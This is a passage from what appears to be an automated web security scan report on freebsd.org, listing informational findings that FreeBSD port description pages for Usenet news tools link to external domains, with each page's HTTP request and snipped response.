The response contains the following links to other domains:

http://sourceforge.net/projects/trn/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/trn4/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:40 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
This is version 4.0 of trn, the threaded news reader. This version
has improved online help, mouse support in xterms, article scoring,
and other new features.

WWW: <A HREF="http://sourceforge.net/projects/trn/">http://sourceforge.net/projects/trn/</A>
...[SNIP]...

20.601. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/nzbget/pkg-descr

The response contains the following links to other domains:

http://docs.newzbin.com/
http://sourceforge.net/projects/nzbget/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/nzbget/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:13 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
NZBGet is a binary newsgrabber, which downloads files from usenet based
on information given in nzb-files. Descriptino of nzb format is available
at <A HREF="http://docs.newzbin.com/">http://docs.newzbin.com/</A>

WWW: <A HREF="http://sourceforge.net/projects/nzbget/">http://sourceforge.net/projects/nzbget/</A>
...[SNIP]...

20.602. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/c-nocem/pkg-descr

The response contains the following links to other domains:

http://sites.inka.de/~bigred/sw/c-nocem.html
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/c-nocem/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:18 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
e state like .newsrc files, it processes only "hide" actions,
and that only by actually deleting the articles.

c-nocem is designed for easy setup and fast run and needs no
maintenance.

WWW: <A HREF="http://sites.inka.de/~bigred/sw/c-nocem.html">http://sites.inka.de/~bigred/sw/c-nocem.html</A>
...[SNIP]...

20.603. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/ija/pkg-descr

The response contains the following links to other domains:

http://wildspark.com/asher/ija/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/ija/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:53 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6418

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
Ija is an interactive command line program that lets you access
Deja (formerly Dejanews) without the web interface.

WWW: <A HREF="http://wildspark.com/asher/ija/">http://wildspark.com/asher/ija/</A>
...[SNIP]...

20.604. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/nzbperl/pkg-descr

The response contains the following links to other domains:

http://noisybox.net/computers/nzbperl/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/nzbperl/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:14 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
pports automated
parsing and sorting of nzb files, multiple servers, automated downloading,
assmbling and decoding of message parts, and has user controlled bandwidth
throttling during runtime.

WWW: <A HREF="http://noisybox.net/computers/nzbperl/">http://noisybox.net/computers/nzbperl/</A>
...[SNIP]...

20.605. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/slrnface/pkg-descr

The response contains the following links to other domains:

http://dave.willfork.com/slrnface/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/slrnface/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:33 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
slrnface shows X-Faces from slrn in an X11 terminal emulator

WWW: <A HREF="http://dave.willfork.com/slrnface/">http://dave.willfork.com/slrnface/</A>
...[SNIP]...

20.606. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/fidogate-ds/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.sourceforge.net/projects/rusfidogate/

Request

GET /cgi/url.cgi?ports/news/fidogate-ds/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:34 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
DS fork of fidogate. It can be used as:
* Fido-Internet Gateway
* Fido FTN-FTN Gateway
* Fido Mail Processor
* Fido File Processor
* Fido Areafix/Filefix

WWW: <A HREF="http://www.sourceforge.net/projects/rusfidogate/">http://www.sourceforge.net/projects/rusfidogate/</A>
...[SNIP]...

20.607. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/yencode/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.yencode.org/

Request

GET /cgi/url.cgi?ports/news/yencode/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:45 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
or multipart
encoded archives in specified directories or recursively.
- Supports SFV file creation for multiple-file archives.
- Fully compliant with the current yEnc specifications.

WWW: <A HREF="http://www.yencode.org/">http://www.yencode.org/</A>
...[SNIP]...

20.608. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/p5-Gateway/pkg-descr

The response contains the following links to other domains:

http://search.cpan.org/dist/Gateway
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/p5-Gateway/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:15 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
ther, it's a
toolkit for *building* robomoderators and gateways that attempts to
take care of all of the nitpicking details for you and drastically
decrease the amount of code you have to write.

WWW: <A HREF="http://search.cpan.org/dist/Gateway">http://search.cpan.org/dist/Gateway</A>
...[SNIP]...

20.609. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/rawdog/pkg-descr

The response contains the following links to other domains:

http://offog.org/code/rawdog.html
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/rawdog/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:30 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...

supports per-feed customizable update times, and uses ETags,
Last-Modified, and gzip compression to minimize network bandwidth
usage.

rawdog's output format is similar to that of PyDS and Hep.

WWW: <A HREF="http://offog.org/code/rawdog.html">http://offog.org/code/rawdog.html</A>
...[SNIP]...

20.610. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/brag/pkg-descr

The response contains the following links to other domains:

http://brag.sourceforge.net/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/brag/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:18 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
Brag collects and assembles multipart binary attachements from newsgroups.
It is a robust command line tool, well suited to run as a cron job.

WWW: <A HREF="http://brag.sourceforge.net/">http://brag.sourceforge.net/</A>
...[SNIP]...

20.611. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/klibido/pkg-descr

The response contains the following links to other domains:

http://klibido.sourceforge.net/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/klibido/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:54 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
s. It has a nice, clean user interface, and supports using multiple
news servers with multiple connections per server. Articles may also be
viewed within the program, including graphic images.

WWW: <A HREF="http://klibido.sourceforge.net/">http://klibido.sourceforge.net/</A>
...[SNIP]...

20.612. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/xrn/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.mit.edu/people/jik/software/xrn.html

Request

GET /cgi/url.cgi?ports/news/xrn/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:44 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
XRN is a program for reading News via NNTP on a UNIX machine which supports the
X Window System.

XRN is compliant with the Good Net-Keeping Seal of Approval (GNKSA).

WWW: <A HREF="http://www.mit.edu/people/jik/software/xrn.html">http://www.mit.edu/people/jik/software/xrn.html</A>
...[SNIP]...

20.613. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/fidogate/pkg-descr

The response contains the following links to other domains:

http://www.fidogate.org/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/fidogate/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:32 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
* Fido-Internet Gateway
* Fido FTN-FTN Gateway
* Fido Mail Processor
* Fido File Processor
* Fido Areafix/Filefix

WWW: <A HREF="http://www.fidogate.org/">http://www.fidogate.org/</A>
...[SNIP]...

20.614. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/net/pear-Net_NNTP/pkg-descr

The response contains the following links to other domains:

http://pear.php.net/package/Net_NNTP/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/net/pear-Net_NNTP/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:26 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
Package for communicating with NNTP/Usenet servers.

WWW: <A HREF="http://pear.php.net/package/Net_NNTP/">http://pear.php.net/package/Net_NNTP/</A>
...[SNIP]...

20.615. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/tin/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.tin.org/

Request

GET /cgi/url.cgi?ports/news/tin/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:36 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
TIN is an easy to use threaded newsreader with NOV/NNTP support.

WWW: <A HREF="http://www.tin.org/">http://www.tin.org/</A>
...[SNIP]...

20.616. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/multisuck/pkg-descr

The response contains the following links to other domains:

http://multisuck.sourceforge.net/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/multisuck/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:00 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
A multi-server, multi-connections-per-server Usenet news sucking mechanism.
Feeds articles to a local news server. Powerful filtering capability. Runs
continuously as a quasi-daemon.

WWW: <A HREF="http://multisuck.sourceforge.net/">http://multisuck.sourceforge.net/</A>
...[SNIP]...

20.617. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/p5-News-Newsrc/pkg-descr

The response contains the following links to other domains:

http://search.cpan.org/dist/News-Newsrc
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/p5-News-Newsrc/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:17 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
newsgroups
- testing whether groups exist and are subscribed
- marking and unmarking articles
- testing whether articles are marked
- returning lists of newsgroups
- returning lists of articles

WWW: <A HREF="http://search.cpan.org/dist/News-Newsrc">http://search.cpan.org/dist/News-Newsrc</A>
...[SNIP]...

20.618. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/suck/pkg-descr

The response contains the following links to other domains:

http://home.comcast.net/~bobyetman/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/suck/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:34 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
local machine, without the remote server doing
anything special. If you have read permission on the server, you can
use suck. Suck does NOT use the NEWNEWS command, hated by many
administrators.

WWW: <A HREF="http://home.comcast.net/~bobyetman/">http://home.comcast.net/~bobyetman/</A>
...[SNIP]...

20.619. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/chinese/pine4/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.washington.edu/pine/

Request

GET /cgi/url.cgi?ports/chinese/pine4/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:46 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
erc to activate the pgp add on scripts pgpdecode,
pgpencode, and pgpsign.

dot.pinerc.sample is an example configuration file(include PGP support) can be
put into your home directory as .pinerc.

WWW: <A HREF="http://www.washington.edu/pine/">http://www.washington.edu/pine/</A>
...[SNIP]...

20.620. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/mmail/pkg-descr

The response contains the following links to other domains:

http://multimail.sourceforge.net/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/mmail/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:59 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6856

